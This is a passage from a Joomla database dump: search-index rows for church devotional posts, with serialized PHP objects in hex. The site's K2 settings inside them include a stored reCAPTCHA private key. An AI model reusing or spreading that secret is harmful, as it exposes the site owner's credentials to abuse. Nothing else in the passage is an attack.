23b733a343a2270617468223b733a37323a22636f6d706f6e656e742f6b322f6974656d2f35372d6172652d796f752d73656e6461626c652d66726f6d2d6f75722d6661746865722d732d68656172742d31332d30382d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3537223b733a353a22726f757465223b733a39313a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d35373a6172652d796f752d73656e6461626c652d66726f6d2d6f75722d6661746865722d732d68656172742d31332d30382d32303137223b733a353a227469746c65223b733a35343a2241524520594f552053454e4441424c453f2046726f6d206f7572204661746865722773204865617274202831332f30382f3230313729223b733a31313a226465736372697074696f6e223b733a3433313a222046524f4d2054484520464154484552e280995320484541525420446561726c792042656c6f7665642c2041524520594f552053454e4441424c453f205468657265206172652033204c4142454c5320476f6420707574206f6e20796f7520617420474f424320323031373b206920444956494e452044454c45474154455320696920474f44e2809953205350454349414c20464f524345532069696920412053454e54204d414e2e20596f75206d7573742063617272792074686520636f6e7363696f75736e657373206f6620746869732066726f6d20746f6461792e20476f642077616e7473206d6520746f2061736b20796f752c2061726520796f752070617274206f66207468652073656e6461626c65206d656e3f2049736169616820362076657273652038207361797320e2809c20416c736f20492068656172642074686520766f696365206f6620746865204c6f72642c20736179696e672c2057686f6d207368616c6c20492073656e642c20616e642077686f2077696c6c20676f20666f722075733f205468656e207361696420492c204865726520616d20493b2073656e64206d652ee2809d20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30382d31322031393a30343a3138223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30382d31322031393a30343a3138223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(294, 'index.php?option=com_k2&view=item&id=58', 'index.php?option=com_k2&view=item&id=58:victory-over-ulcers-and-heicobater-pylori-bacteria-scriptures', 'Victory over ulcers and heicobater pylori bacteria SCRIPTURES', ' Victory over ulcers and heicobater pylori bacteria SCRIPTURES Psalm 18:45 Isaiah 49:26 Jer 30:16 Jer 33:6 Jer 30:17 ', '2017-12-28 12:40:23', 'e4aadc9512efbfb4fa9db32368b6e64b', 1, 1, 1, '*', '2017-10-02 10:07:50', '0000-00-00 00:00:00', '2017-10-02 10:07:50', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223538223b733a353a22616c696173223b733a36313a22766963746f72792d6f7665722d756c636572732d616e642d686569636f62617465722d70796c6f72692d62616374657269612d73637269707475726573223b733a373a2273756d6d617279223b733a3137353a223c703e566963746f7279206f76657220756c6365727320616e6420686569636f62617465722070796c6f72692062616374657269612053435249505455524553c2a03c2f703e0d0a3c703e5073616c6d2031383a34353c2f703e0d0a3c703e4973616961682034393a32363c2f703e0d0a3c703e4a65722033303a31363c2f703e0d0a3c703e4a65722033333a363c2f703e0d0a3c703e4a65722033303a31373c2f703e0d0a3c703ec2a03c2f703e223b733a343a22626f6479223b733a303a22223b733a353a226361746964223b733a313a2231223b733a31303a22637265617465645f6279223b733a333a22323030223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d31322d32382031323a34303a3139223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2231223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a373a224865616c696e67223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a36343a2235383a766963746f72792d6f7665722d756c636572732d616e642d686569636f62617465722d70796c6f72692d62616374657269612d73637269707475726573223b733a373a22636174736c7567223b733a393a22313a6865616c696e67223b733a363a22617574686f72223b733a32353a2252657620284d727329204f79656e696b65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a38323a22636f6d706f6e656e742f6b322f6974656d2f35382d766963746f72792d6f7665722d756c636572732d616e642d686569636f62617465722d70796c6f72692d62616374657269612d73637269707475726573223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32353a2252657620284d727329204f79656e696b65204172656f67756e223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32353a2252657620284d727329204f79656e696b65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a373a224865616c696e67223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224865616c696e67223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3538223b733a353a22726f757465223b733a3130313a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d35383a766963746f72792d6f7665722d756c636572732d616e642d686569636f62617465722d70796c6f72692d62616374657269612d73637269707475726573223b733a353a227469746c65223b733a36313a22566963746f7279206f76657220756c6365727320616e6420686569636f62617465722070796c6f72692062616374657269612053435249505455524553223b733a31313a226465736372697074696f6e223b733a3131373a2220566963746f7279206f76657220756c6365727320616e6420686569636f62617465722070796c6f72692062616374657269612053435249505455524553205073616c6d2031383a3435204973616961682034393a3236204a65722033303a3136204a65722033333a36204a65722033303a313720223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d31302d30322031303a30373a3530223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d31302d30322031303a30373a3530223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
